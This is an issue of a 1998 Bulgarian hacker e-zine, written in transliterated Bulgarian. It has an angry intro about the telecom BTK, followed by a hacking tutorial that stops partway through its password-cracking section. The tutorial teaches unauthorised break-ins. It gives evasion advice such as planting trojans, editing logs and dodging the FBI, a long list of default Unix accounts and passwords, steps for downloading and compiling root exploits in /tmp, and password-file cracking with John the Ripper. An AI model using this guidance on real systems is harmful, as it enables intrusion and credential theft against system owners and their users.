Warning: This text file's to be used for educational purposes only ! http://www.ancient.pain.nat.bg aSCii aRT By:EXo Ú¿Ú¿Ú¿Ú¿Ú¿Ú¿Ú¿Ú¿Ú¿Ú¿Ú¿Ú¿Ú¿Ú¿Ú¿Ú¿Ú¿Ú¿Ú¿Ú¿Ú¿Ú¿Ú¿Ú¿Ú¿Ú¿Ú¿Ú¿Ú¿Ú¿Ú¿Ú¿Ú¿Ú¿Ú¿Ú¿Ú¿ ÚÙÀÙÀÙÀÙÀÙÀÙÀÙÀÙÀÙÀÙÀÙÀÙÀÙÀÙÀÙÀÙÀÙÀÙÀÙÀÙÀÙÀÙÀÙÀÙÀÙÀÙÀÙÀÙÀÙÀÙÀÙÀÙÀÙÀÙÀÙÀÙÀÙÀ¿ ³ ù ú ³ ³ /ÄÍÍ/ / / /ÄÍÍ/ /ÄÍÍ/ /ÄÍÍ\ /ÄÍ/ /ÄÍÍ/ /\Í/\ oFFiCiaL ³ ³ ³ º ³ ³ ³ º ³ ³ ³ \ / º ³ ³ º aNTi-BTK ³ ³ ³ ³ ³ º ³ ³ ³ ³ ³ \ ³ ³ ³ ³ ³ MaGaZiNe ³ ³ /ÄÍÍ/ ÃÄÍÍ´ /ÄÍÍ/ /ÄÍ+ /ÄÍ+ ³ º ³ ³ ³ ³ ³ þùú úùþ ³ ³ ³ ³ º ³ \ ³ ³ ³ ³ ³ / ³ + ³ 19.03.98 ³ ³ Ï Ï Ï Á \ \ÄÍÍ\ \ÄÍÍ\ \ÄÍÍÍ/ \ÄÍÍ/ Ï Ï iSSue 12 ³ ³ ú ú ³ À¿Ú¿Ú¿Ú¿Ú¿Ú¿Ú¿Ú¿Ú¿Ú¿Ú¿Ú¿Ú¿Ú¿Ú¿Ú¿Ú¿Ú¿Ú¿Ú¿Ú¿Ú¿Ú¿Ú¿Ú¿Ú¿Ú¿Ú¿Ú¿Ú¿Ú¿Ú¿Ú¿Ú¿Ú¿Ú¿Ú¿ÚÙ ÀÙÀÙÀÙÀÙÀÙÀÙÀÙÀÙÀÙÀÙÀÙÀÙÀÙÀÙÀÙÀÙÀÙÀÙÀÙÀÙÀÙÀÙÀÙÀÙÀÙÀÙÀÙÀÙÀÙÀÙÀÙÀÙÀÙÀÙÀÙÀÙÀÙ ú ú ù ù þ ÃÄÄÄ¿ ÚÚÄ¿ ÚÄ¿ þ º ÚÄÙ ³³Â³ ³ Á ú º º ³ ³ÀÙ³ ³  ù º º Á ÀÄÄÙ ÀÄÄÙ þ º º ÃÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÙ º º º º auTHoR/BRouGHT By º º ÄÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÄ º º úͶ1ÇÍ´ BTK - Our "favourite" Company (Intro) EXo º º º º úͶ2ÇÍ´ Hacking Tutorial IronCode º º º º úͶ3ÇÍ´ CI$/SpryNet Account Phishing EXo º º º º úͶ4ÇÍ´ Who the fuck is BTC ? (Phun) Hipodilsky º º º º úͶ5ÇÍ´ The Complete Guide to Cows (Phun) EXo º º º º úͶ6ÇÍ´ SprintNet/SITA Network Phones List EXo º º º º úͶ7ÇÍ´ Members List & Additional Info º º º Ç Ä Ä Ä Ä Ä Ä Ä Ä Ä Ä Ä Ä Ä Ä Ä Ä Ä Ä Ä Ä Ä Ä Ä Ä Ä Ä Ä Ä Ä Ä Ä Ä Ä Ä Ä Ä Ä Ä¶ º º º BTK - Kompaniq "liubima" na cql edin narod By: EXo º º ÄÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÄ ÄÍÍÍÍÍÄ º º º º Fly high, touch the skyº º Never know the reason whyº º Victim of Fate !º º º º Chestita Baba Marta, chestit 3-ti mart, chestit 8-mart, chestita prolet,º ºCHESTIT Phreedom 12. Prolet e (e w momenta dokato pisha introto malkoº ºponawalqwa, ama inache e got), wsichki sme "weseli", wzimame si redownoº ºwitaminchetat protiw proletnata (zimna) umora, radwame se na liubowta (uh..º ºtowa puka kak go kazah :) i si mislim za BTK. A te (TQ) systo si mislqt zaº ºnas i kak da ni izmyknat paricite... :). Takiwa misli qwno spohovdat iº ºpowecheto ISP-ta (t.e. wsichkite), kakto i wsichki ostanali, koito seº ºopitwat da naprawqt uslugata "Internet Access" nedostypen za wsichki lux. Eº ºda, ama NE, 'stoto ni ima nas da im go porwame, da namirame probiwi iº ºprobiwcheta - tuk dupchica, tam dupchica i hop.. bezplaten I'net.º ºNesluchajno i tozi broj na Phreedom e pregyrnal razni polezni (e kolkoº ºpolezni...towa wie ste precenite sami) matriali na tema hacking, CI$, phonesº ºetc. (kakto i polagastoto se kilce psuwni na tema BTK ;). BTW 10x to pfloydº ºza ideqta za zaglawieto na Introto. º º Neusetno Phreedom se prewyrna ot prosto endo phreak .txt file-che wº ºofficial (i edinstweno zasega) hack/crack/phreak/phone/phuck :) izdanie naº ºbylgarski. Towa nqma nisto losho estestweno. Wsichko, koeto move po nqkakywº ºnachin da ni pomogne da go nabutame na razanite lioliowci, koito smqtat daº ºsmuknat i poslednata ni stotinka e dobre doshlo. Nqma da wyrna nikoj, a akoº ºnqkoga go naprawq move spokojno da me linchuwate! Ta neka razchupim lafa... º º Sedq si se chudq s kolko li sme gi wytrili i dali im e dostatychno.. Steº ºkavat nqkoi - i te horata systo trqbwa da pechelqt. WQRNO E ! Samo, che daº ºpechelish dwojno i trojno za smetka na tezi, koito izkat prosto daº ºposyrfirat..... E prosto nqma da q byde. Cheta wchera wyw westnika - BTK pakº ºse kanqt da wdignat cenite - be tiq hora nasita nqmat li bre !!! Sywsem daº ºotkavat wsichki ot nacionalnite telefonni uslugi li izkat, ili da dostignatº ºpo ceni GSM i Mobifonite. Samo deto nikoga ne mogat da gi dostignat poº ºkachestwo, kamo li mobilnost. A kato se seta pyk za skapanite ni ISP-ta detoº ºs/u 20$ uv dawat pylen dostyp mi se plache. E da...za edno edinstweno nestoº ºmove da im se priznae che pokriwat znachenieto na prilagatelnotoº ºpylen(a,o,i) - PYLNA SKRYB! Pyrwo nabirash po 2000 pyti dokato se wyrvesh (aº ºdori i togawa e malko symnitelno, stoto BTK winagi e nastrek i samo debneº ºkak da dropne nqkoj :). Sled towa se chudish zasto podqwolite sled kato siº ºna 28800 (ili na 14400) shibanata wryzka ne se kachwa nad 1.2kb/sec, i zastoº ºpo dqwolite ot wreme na wreme zamira wsichko, i zasto mi reslowa po 2 chasaº ºraznite adresi, i zasto ICQ ne move da se connectne, i zasto ne si naprawihº ºkontrolnoto (a.. ! za towa maj ne sa winowni te, ama nisto :), i zastoº ºmodemite dropqt postoqnno, i zasto lokalnata posta neraboti, i zastoº ºnewsgroupite sa boza, i zasto..., i zasto.., i zasto, I ZASTO !!!! º º Pisna mi bre ! º º Dobriqt star CI$ beshe mogo pyti po-dobyr (i wse oste si e :). Ot kakywº ºzor ste plastam 20$ (ta i poweche) na nqkyw nestasnik deto move da miº ºosiguri swqstna wryzka samo m/u 3 i 7 prez nosta ? Az da ne sym sowa bre...º ºKazwat cybermaniac ! Kakwo znachi towa - da ne spq ili move bi da spq po 20º ºminuti na den ? AZ SYM CHOWEK (kolkoto i stranno da zwuchi) i iskam normalenº ºInternet. Ne iskam mnogo, dave nikak...ala qwno majka mi trqbwa da se chukaº ºs shefa na BTK, a basta mi da e sobstwenik na ISP, za da move da se chustwamº ºnormalen. º º I posle razprawqt: hackerite tuk wlizali bez da plastat, tam kradnaliº ºshadow file, tuk preebali web stranica, tam preebali na nqkoj majkata (iliº ºsestrata.. wse taq i dwete sa grozni :)... E ne wivdam kak drugo qche moveº ºda byde. Da im se nenachudi chowek ! Nqkoi poznati si kupiha ot po-ewtiniteº ºuchenicheski accounti, koito se predlagat weche w pochti wsqko ISP (skoro iº ºpo REP-owete ste gi pusnat sigurno). W nachaloto wsichki bqha dowolni,º ºstastliwi..., no kakwo chuwam sega - "... ot 100-tnoto nabirane mi dawaº ºswobodno...", "...dwa dena servera ne otgowarq...", "...dyrvi mi stabilno naº º33600... samo sled 3 chasa !". I gorkite si kysat nerwite za da poluchat 2-3º ºchasa w mrevata (zastoto pari nikoj ne wrysta...). Na wsichkoto otgoreº ºaccountyt raboti samo m/u 19:00 i 7:00 ili oste po-dobre samo prez nostaº º(t.e. sled 0:00 do 7-8chasa). º º Towa e UCHENICHESKI(STUDENTSKI) ACCOUNT !!! º º Ot tuk qwno trqbwa da si naprawim izwoda, che wsichki uchenici/studenti,º ºkoito polzwat goreposochenite accounti ne trqbwa da spqt nostem... IDIOTI !º ºTe iskat da naprawqt ot nas malki idiotcheta, koito pribirajki se w 7 sledº ºdaskalo/lekcii da pochwat da nabirat s tajnata nadevda, che ste poluchatº ºstabilna wryzka nqkyde kym 11:30... A towa nost na discoteka, kuponi,º ºpriqtelski partita, semejna wecherq ili razhodki s priqtelkata (ili sº ºdqsnata ryka za tezi s po-razwito wyobravenie) - takiwa ponqtiq trqbwa da seº ºiztriqt ot rechnika na wseki, kojto po edna ili druga nestastna prichina eº ºdruznal da povelae da se connectne... Posle pak ni zaliwat (...move biº ºpo-tochno kazano e poliwat...) s reklami za KACHESTWEN I EWTIN dostyp. Towaº ºli sa wi predstawite za kachestwen Internet ? E mojte ne sa ! º º Kojto ne e syglasen move... abe move da si go nachuka otzad prosto ! º º º º Ä Ä Ä Ä Ä Ä Ä Ä Ä Ä Ä Ä Ä Ä Ä Ä Ä Ä Ä Ä Ä Ä Ä Ä Ä Ä Ä Ä Ä Ä Ä Ä Ä Ä Ä Ä Ä Ä¶ º º º Hacking Tutorial By: IronCode º º ÄÍÍÍÍÍÍÍÍÍÍÍÍÍÍÄ ÄÍÍÍÍÍÍÍÍÍÍÄ º º º º Chovek ne mozhe vse da sedi i da psuva razni tupaci, che ne sa muº ºosigurili normalni uslovia za zhivot (t.e. svestni komunikacii), che otgoreº ºna tova go i obirat. I tui kato PHREEDOM se chete predimno ot hackeri,º ºreshih da napisha neshto, koeto mozhe bi shte im bude interesno (e,º ºpredpolagam, po-opitnite veche znaiat tezi neshta) i dori polezno. º º º º ÚÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄ¿ º º ³ STANDARD DISCLAIMER * STANDARD DISCLAIMER * STANDARD DISCLAIMER ³ º º ÃÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄ´ º º ³Ne sum vi bavachka. Pravete kakvoto shtete, samo da ne mi vreskat ³ º º ³na men posle. Razprostraniavaite kakto iskate, no ne go promeniaite.³ º º ÀÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÙ º º º º Table Of Contents: º º úÄ ÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄ ÄÄÄÄÄÄÄ ÄÄÄ Ä Äú º º 1. Etika i Bezopasnost º º 2. Unix º º 3. Nachini za Hackvane º º 3.1. Rooting º º 3.2. Cracking º º 3.2.1. PHF Exploit º º 3.2.2. WebGais Exploit º º 3.2.3. WebSendMail Exploit º º 3.2.4. Majordomo Exploit º º 3.3. Brute Force º º 3.4. Social Engineering º º 3.5. Trashing º º 4. Niakoi po-interesni links º º úÄ ÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄ ÄÄÄÄÄÄÄ ÄÄÄ Ä Äú º º º º 1. ETiKA i BEZOPASNOST º º úÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄú º º º º Shte zapochnem s niakolko suveta, kum koito triabva da se pridurzhate,º ºza da mozhe ne samo da si spestite nepriatnosti, no i da izpolzvate umeniataº ºsi, bez da nanasiate shteti na kompiutrute, koito hackvate ili kompaniite,º ºkoito gi pritezhavat (credits - Mentor, LOD/H): º º º º 1. Ne nanasiaite shteti suznatelno na *nikoia* sistema. º º 2. Ne promeniaite nikakvi sistemni failove razlichni ot tezi, ot koitoº º imate nuzhda, za da si osigurite izbiagvane na zasichane i budeshtº º dostap (troianski kone, modificirane na logovete i t.n. vsichki saº º neobhodimi za oceliavaneto vi vuzmozhno nai-dulgo). º º 3. Ne ostaviaite vasheto (ili nechie drugo) istinsko ime, istinski priakorº º ili istinski telefonen nomer na nikoia ot sistemite, do koito ste imaliº º dostap nelegalno. *Mogat* i shte vi proslediat ot priakora vi. º º 4. Vnimavaite s kogo spodeliate informacia. Chengetata (FBI) stavat vseº º po- hitri. Osnovno, ako ne znaete telefonniat im nomer (voice), ime iº º profesia ili ne ste govorili s tiah voice ili ne-informacionno noseshtiº º razgovori, vnimavaite. º º 5. Ne si ostaviaite istinskia telefonen nomer na nikogo, kogoto neº º poznavate. Tova vkliuchva logvane v BBS-i, niama znachenie kak viº º izglezhdat. Ako ne poznavate sysopa, ostavete belezhka na niakolkoº º dovereni choveka, koito da vi utvardiat. º º 6. Ne hackvaite pravitelstveni kompiutri. Da, pravitelstvenite kompiutri eº º bezopasno da se hackvat, no sa malko i daleche pomezhdu si. Iº º pravitelstvoto ima bezkraino poveche vreme i resursi da vi prosledi,º º otkolkoto kompania, koiato triabva da harchi pari za pravosudie. º º 7. Ne izpolzvaite kodove, osven ako niama *NIKAKUV* nachin da se izbegneº º (niamate lokalen telenet (aka sprintnet aka GlobalOne) ili tymnetº º outdial i ne pravete mezhdugradski razgovori). Ako izpolzvate kodove,º º dulgi dostatuchno, shte vi hvanat. Tochka. º º 8. Ne se strahuvaite da budete paranoichni. Pomnete, *narushavate zakona*.º º Niama vreda da suhraniavate vsichko kodirano na tvurdia si disk, iliº º druzhte belezhkite si pogrebani v zadnia dvor ili v bagazhnika naº º kolata. Mozhe da se chuvstvate malko smeshni, no shte vi e mnogoº º po-smeshno kogato sreshtnete Bruno, vashia travestit sakiliinik, zaklalº º cialoto si semeistvo. º º 9. Gledaite kakvo publikuvate v boards. Povecheto ot naistina strahotniteº º hackeri ne publikuvat *nishto* za sistemata, varhu koiato v momentaº º rabotiat, osven v nai-shirok smisul (rabotia varhu UNIX, ili COSMOS, iliº º neshto obshto. A ne "Hackvam voice-mail sistemata na General Electric"º º ili neshto glupavo i razkrivashto kato tova). º º 10. Ne se strahuvaite da zadavate vuprosi. Za tova sa po-opitnite hackeri.º º No ne ochakvaite na *vsichko*, koeto pitate, da poluchite otgovor. Imaº º niakoi neshta (LMOS, naprimer), s koito nachinaeshtiat hacker ne triabvaº º da se zanimava. Ili shte vi hvanat, ili shte preebete drugi, ili iº º dvete. º º 11. I nakraia, triabva na praktika da hackvate. Mozhete da slagate vº º boards kakvoto si iskate, i mozhete da prochetete vsichkite textoviº º failove na sveta, no dokato na praktika ne zapochnete da go pravite,º º nikoga niama da razberete za kakvo e vsichko tova. Niama takava trupkaº º kakto kogato pronikvate v purvata si sistema (e, dobre, seshtam se zaº º dve po-golemi trupki, no shvashtate kartinata). º º º º Edno ot nai-bezopasnite mesta, kudeto mozhete da zapochnete svoiataº ºhackerska kariera, e na kompiutarna sistema, prinadlezhashta na kolezh.º ºUniversitetskite kompiutri imat prochuto slaba sigurnost, i sa po-sviknali sº ºhackerite, tui kato v kompiutarnia otdel na vseki kolezh ima edin ili dvama,º ºtaka che e po-malko veroiatno da napraviat neshto, ako vi zasekat. Noº ºmalkoto ot tiah, koito vi zasekat i pritezhavat personala, koito da dovedeº ºdo proslediavaneto vi, sa slabi, dokato ne ste razrushitelni. º º Ako veche ste student v kolezh, tova e idealno, tui kato mozhete legalnoº ºda izuchavate kompiutarnata si sistema kolkoto vi surce iska, posle daº ºizlezete navun i da se ogledate za podobni sistemi, v koito mozhete daº ºproniknete s uverenost, tui kato veche ste zapoznati s tiah. º º I nakraia, ako vi hvanat, ostanete tihi, dokato ne si namerite advokat,º ºtaka che mozhete sushto da mluknete i da chakate. º º º º 2. UNIX º º úÄÄÄÄÄú º º º º Takaaa, znachi iskate da hacknete nechia sistema... Ami da predpolozhim,º ºche stava duma za Unix mashina, tui kato Unix e edna ot nai-shirokoº ºrazprostranenite mrezhovi operacionni sistemi. º º Da vidim s kakvo se harakterizira Unix. Mozhete da ia poznaete poº ºprompta "login:", koito mozhe da bude predshestvan ot neshto - naprimerº º"hacker login:" ili kakvoto si poiska sysadmina. Ponezhe Unix ne e nichiaº ºsobstvenost, ima razlichni modifikacii - Xenix, SCO, SunOS, BSD, AIX i t.n.,º ºraboteshti na razlichni mashini - naprimer HP-UX, razrabotena za serveriteº ºna Hewlett Packard, AIX na IBM i t.n., no obshto vzeto operacionnata sistemaº ºsi e sushtata. Edna ot modifikaciite - Linux, rezultat ot proekta GNU,º ºceliasht razrabotkata na edna napulno bezplatna i svobodna operacionnaº ºsistema i software, sushto e mnogo razprostranena. º º Po princip imenata i parolite sa v lowercase, no Unix e case-sensitive.º ºDulzhinata na login/password obiknoveno e maximum 8 simvola, kato vsichko,º ºvuvedeno sled tezi 8 simvola se otriazva (no ima i izkliuchenia). Akoº ºvuvedete username-a izcialo s glavni bukvi, Unix priema, che rabotite naº ºterminal, koito poddurzha samo glavni bukvi, taka che ot tuk natatuk shteº ºvizhdate samo glavni bukvi. Simvolut \ indikira, che bukvata sled nego eº ºglavna, naprimer "\PASSWORD" se chete kato "Password", no predpolagam, cheº ºtova niama da vi e neobhodimo, tui kato tova sa otzhivelici ot kraia naº ºsheisette, kogato e zapochnata razrabotkata na Unix. º º Obiknoveno imate pravo na 4 login/password opita, no tova mozhe da budeº ºpromeneno po zhelanie na sysadmina (chesto sreshtano iavlenie e iº ºneogranicheniat broi opiti). º º Osven tova Unix niama da vi kazhe dali username-a, koito ste vuveli, eº ºvaliden, a shte vi popita za password, i sled tova shte vi informiraº º"login incorrect", tochno kakto bi stanalo ako samo biahte sburkaliº ºparolata. Tova oznachava, che triabva da imate predstava chii account shteº ºhackvate. º º Unix informira potrebitelite si koga e bil napraven posledniatº ºneuspeshen opit za logvane, no nishto poveche (v dosta sluchai dori i tovaº ºniama). Vse pak, sysadmina ima logove, taka che pri zhelanie mozhe da viº ºprosledi (no obiknoveno takiva logove niama). º º Kogato ste vutre v Unix, shte poluchite prompt $ ili % za normalenº ºaccount ($ e po-chesto sreshtaniat) i # za superuser account. Vinagiº ºsushtestvuva edin account s login "root", koito e sus superuser-ski prava.º ºOt nego mozhete da pravite sus sistemata kakvoto si poiskate, vse edno, cheº ºste sobstvenik na vsichkite failove. º º º º 3. NACHINI ZA HACKVANE º º úÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄú º º º º I eto, che veche ste si nabeliazali mashinata, koiato iskate daº ºhackvate, i znaete, che vurvi pod upravlenieto na niakakuv Unix. Po principº ºima niakolko nachina da hacknete niakoia sistema: º º 1. Rooting - sdobivane sus superuserski (root) prava sled normalnoº ºlogvane º º 2. Cracking - namirane na failovete s parolite i dekodiraneto im º º 3. Brute Force - otgatvane na parolata º º 4. Social Engineering - luzhene i mamene s cel dokopvane do parolite º º 5. Trashing - rovene iz bokluka na providera, za da namerite accounti º º º º 3.1. ROOTING º º úÄÄÄÄÄÄÄÄÄÄú º º º º Za da izpolzvate purviat metod, shte vi e nuzhen account za sistemata.º ºEto niakolko osnovni accounta, koito chesto prisustvat v edna Unix sistemaº º(root account prisustva VINAGI) i default (ili chesto sreshtanite) paroli,º ºako ima takiva. Razbira se, osven tezi paroli, vie zadulzhitelno shteº ºprobvate da vlezete i bez parola (prosto s CR pri "password:"), kakto i zaº ºparola da izpolzvate username-a (login: ftp, password: ftp), taka che teziº ºparoli ne sa v podrazbirashtite se. º º º º Username Password º º úÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄú º º root º º daemon º º adm admin, sysadm, sysadmin, operator, manager º º uucp º º bin º º sys º º 123 lotus, lotus123 º º adduser º º admin adm, sysadm, sysadmin, operator, manager º º anon anonymous º º anonuucp anon, uucp, nuucp º º anonymous anon º º asg device, devadmin º º audit º º auth º º backappl º º backup save, tar º º batch º º bbx º º blast º º bupsched º º cbm º º cbmtest º º checkfsys º º control º º cron º º csr support, custsup º º dbcat database, catalog º º default user, guest º º demo tour, guest º º dev º º devel º º devshp º º diag sysdiag, sysdiags, diags, test º º diags diag, sysdiag, sysdiags º º dialup º º dos º º fax º º field fld, service, support, test º º filepro º º finger º º fms º º friend guest, visitor º º ftp º º games º º general º º gp º º gsa º º guest visitor, demo, friend, tour º º help º º host º º hpdb º º info º º informix database º º ingres database º º inquiry º º install º º journal º º journals º º kcml º º learn º º lib library, syslib º º link º º listen º º lp print, spooler, lpadmin º º lpadmin lp, adm, admin º º lpd º º ls º º mail º º maint sysmaint, service º º makefsys º º man º º manager mgr, man, sysmgr, sysman, operator º º mdf º º menu º º mountfsys º º ncrm ncr º º net network º º netinst inst, install, net, network º º netman net, man, manager, mgr, netmgr, network º º netmgr net, man, manager, mgr, netman, network º º network net º º newconv º º news º º nobody anon º º nuucp anon º º oasys oa º º odt opendesktop º º online º º openmail mail º º oper operator, manager, adm, admin, sysadmin, mgr º º operator sysop, oper, manager º º opp º º oracle database º º oraclev5 oracle, database º º oradev oracle º º pcs º º pcsloc º º pctest º º postmaster mail º º powerdown shutdown º º priv private º º prod º º pub public º º public pub º º reboot º º remote º º report º º rha º º rje º º rsm º º rsmadm rsm, adm, admin º º rusr º º sales º º sas º º save backup º º savep º º service field, support º º setup º º shutdown º º smtp mail º º softwork º º space º º startup º º su º º sundiag sysdiag, diag, diags, sysdiags º º suoper su, oper, operator º º super supervisor, manager, operator º º support º º sysadm adm, admin, operator, manager º º sysdiag diag, diags, sysdiags º º sysinfo info º º sysmaint maint, service º º sysman manager, mgr, man, admin, operator, sysadmin º º sysmgr manager, mgr, man, admin, operator, sysadmin º º system sys, unix, shell, syslib, lib, operator º º systest test, tester, testuser, user º º test tester, testuser, systest, user º º tester test, user, testuser º º testuser test, tester, user, systest º º tftp º º tour demo, guest, user, visitor º º transfer º º tty º º tutor º º tutorial º º umountfsys º º unix º º unixmail mail, unix º º user guest, demo º º userp user º º usr user º º usrlimit º º utest º º uucpadm adm, admin, uucp º º uuadm uucp, adm º º uuadmin uucp, admin º º uuhost uucp, host º º uulog uucp, log º º uunx uucp º º uupick uucp, pick º º uustat uucp, stat º º uuto uucp, to º º uux uucp º º va º º vashell º º vax º º visitor guest, friend, demo, tour º º vlsi º º vmsys vm, face º º vsifax º º who º º wp º º wp51 º º www º º x25 pad º º x25test test º º x400 º º úÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄú º º º º Ne uspeete li da vlezete chrez niakoi ot tezi accounti, sushtestvuvaº ºvuzmozhnost da napravite opit da otgatnete parolata (za podrobnosti vizhº º3.3. Brute Force). Vazhnoto e da uspeete da vlezete v sistemata. º º Ako uspeete da se lognete, bi triabvalo da vidite sistemnia prompt. Akoº ºvidite "#", to vie imate superuserski prava i mozhete da pravite susº ºsistemata kakvoto si poiskate - ot prosto razglezhdane na failove, prezº ºpodmianata na web stranici i t.n. ta do zatrivane na celia server - izborutº ºsi e vash. Ako obache vmesto tova poluchite "$" ili "%" - zapochvaº ºinteresnata chast. º º Rootvaneto se pravi chrez izpolzvaneto na taka narechenite "exploits" -º ºbugove, murliavo napisani programi ili prosto dupki v zashtitata naº ºsistemata. Obiknoveno mehanizmut e sledniat: startira se niakakuv proces,º ºkoito ima root prava (ili vika root), no mu se podavat greshni danni iliº ºprosto se osiguriavat malko po-interesni uslovia za rabotata mu, taka che daº ºstane niakakuv gaf (obiknoveno prezhdevremenno prekratiavane na rabotata naº ºprocesa) i da si ostanete s root prava. Takiva exploitove - kolkoto ti dushaº ºiska, triabva samo da potursish. º º Interesno miasto za namirane na exploits i vsiakakvi takiva hacker toolsº ºe http://www.rootshell.com - server, posveten na sigurnostta, exploits,º ºpatches, zashtiti i vsiakakvi takiva raboti. Neshtata sa sortirani po red naº ºizlizaneto im - mozhete da preglezhdate kakvo e izliazlo do sega prez toziº ºmesec, prez minalia mesec, po-minalia i t.n. Tova shte vi bude mnogo poleznoº ºot tuk natatuk. º º Sega triabva da namerite exploit, s koito da vzemete root. V rootshellº ºgledaite purvo za nai-novoto, za koeto e nai-malko veroiatno da ima patch.º ºPreceniavaite dobre. Niakoi exploits ne sa mnogo obeshtavashti - naprimerº ºtozi v SVGA bibliotekata na Quake 2 za Linux. Vupreki, che mozhe bi raboti,º ºedva li mozhete da ochakvate da ima Quake 2 na edin seriozen server. Vse pakº ºopitaite. Sushto taka, ne propuskaite da probvate exploits, suzdadeniº ºspecialno za OS, koiato iskate da hackvate. Naprimer ako vidite programa zaº ºRedHat Linux 4.2 i znaete, che servera vurvi na RedHat 4.2 - tova e za vas.º ºDori i exploita da e za druga versia, nishto ne prechi da opitate. º º Sled kato namerite exploit, triabva da se kachi na servera. V toziº ºsluchai rootshell.com otnovo e mnogo polezen - puskate si browser na samiaº ºserver i iztegliate exploita. Vupreki che mozhe i da namerite binary-to naº ºprogramata, v povecheto sluchai exploitovete shte predstavliavat programi naº ºC zaradi mezhduplatformenata suvmestimost. S browsera (lynx) iztegliateº ºexploita i go zapisvate na diska na servera. Mozhe da se poluchi greshka -º ºda niamate dostup za pisane po diska poradi ogranichenite prava. Ne seº ºplashete - otidete v direktoriata /tmp, tam bi triabvalo da mozhete daº ºzapishete sorsa. º º Kompiliraite (s gcc ili tam kakuvto C kompilator namerite na servera) iº ºdeistvaite! Obiknoveno v sorsa na exploita shte namerite ukazania za rabota,º ºa poniakoga ukazania shte poluchite sled startiraneto na exploita. Priº ºkusmet sled prikliuchvaneto na procesa shte vidite poznatia veche "#". Akoº ºobache zurnete dobria star "$" - ne se otchaivaite - produlzhavaite daº ºopitvate novi exploitove, vse niakoga shte uspeete da izmamite sistemata. º º Ako neshto v opisania do tuk proces ne se poluchi kakto triabva, misleteº ºna miasto kakvo mozhe da se napravi. Nai-vazhnoto e da se lognete, daº ºuspeete da dokopate root i posle - kakvoto vi dusha iska :-) º º º º 3.2. CRACKING º º úÄÄÄÄÄÄÄÄÄÄÄú º º º º Ako sluchaino neshto ne se poluchi s purvia metod, ostana vtorataº ºalternativa - sdobivane s failovete s parolite. Tuk veche mozhete daº ºimprovizirate i da pravite vsichko, kakvoto vi hrumne, za da dostignete doº ºtiah. Az, razbira se, shte se postaraia da vi dam tema za razmisul. º º I taka, kakvo predstavliava faila s parolite? Ami tova e fail s imeº ºpasswd, koito zadulzhitelno prisustva vuv vsiaka Unix sistema i suhraniava vº ºsebe si informacia za potrebitelite i tehnite paroli. Obiknoveno se namira vº ºdirektoriata "/etc". Parolata vse pak e kodirana, taka che ne se nadiavaite,º ºche shte e lesno. Kakto i da e, sushtestvuvat password crackeri, raboteshtiº ºs rechnici, ili generirashti sluchaini paroli, koito sravnitelno burzo mogatº ºda se spraviat s takava zadachka. Az lichno (i oshte mnooogo hackeri poº ºcelia sviat) smiatam, che nai-dobriat e John The Ripper (da, po-dobur dori iº ºot Cracker Jack). Uzhasno e burz, raboti s rechnik, kato pritezhavaº ºvsiakakvi pravila za modifikacii na dumite ot rechnika - vsichko, koeto eº ºhrumnalo na avtorite - naprimer v rechnika vizhda dumata "fred" i probva sº ºfred, derf, Fred, freD, fredderf, fredfred i t.n., dori i s gtrf - susedniteº ºsimboli (avtorut dori bil vizhdal niakude takava parola :-), mary -> marie iº ºt.n., kato mozhete i sami da si dobaviate pravila. Ima si programa zaº ºunshadowing (ot passwd i shadow suzdava razkodiruem passwd), kakto iº ºprograma za vadene na wordlist (rechnik) ot obiknoven textov fail (mnogoº ºpolezno, ako naprimer iskate da si izvadite spisuk s bulgarski dumi). I katoº ºstava duma za rechnici, nai-golemiat dostupen v momenta wordlist mozhe da seº ºnameri na: º º ftp://ftp.ox.ac.uk/pub/wordlists/ º º No da se vurnem na passwd failovete. Ako poglednete kum sudurzhanieto naº ºedin primeren passwd, shte vidite neshto takova: º º º º root:x:0:1:root:/:/bin/bash º º daemon:x:1:1:daemon:/: º º bin:x:2:2:bin:/usr/bin: º º adm:x:4:4:Admin:/usr/adm:/sbin/sh º º listen:x:37:4:Network Admin:/usr/net/nls: º º nobody:x:60001:60001:uid nobody:/: º º noaccess:x:60002:60002:uid noaccess:/: º º ftp:x:101:4:FTPUser:/export/home/ftp: º º dtodd:yYn1sav8tKzOI:201:4:John Todd:/home/dtodd:/sbin/sh º º º º Ot cialata tazi sekcia edinstvenoto polezno neshto, koeto mozhete daº ºizpolzvate, e reda, zapochvasht s dtodd, tui kato edinstven toi sudurzhaº ºparola. Sudurzhanieto na reda se interpretira taka: º º Username: dtodd º º Encrypted password: yYn1sav8tKzOI º º User number: 201 º º Group number: 4 º º Real name: John Todd º º Home directory: /home/dtodd º º Shell: /sbin/sh º º 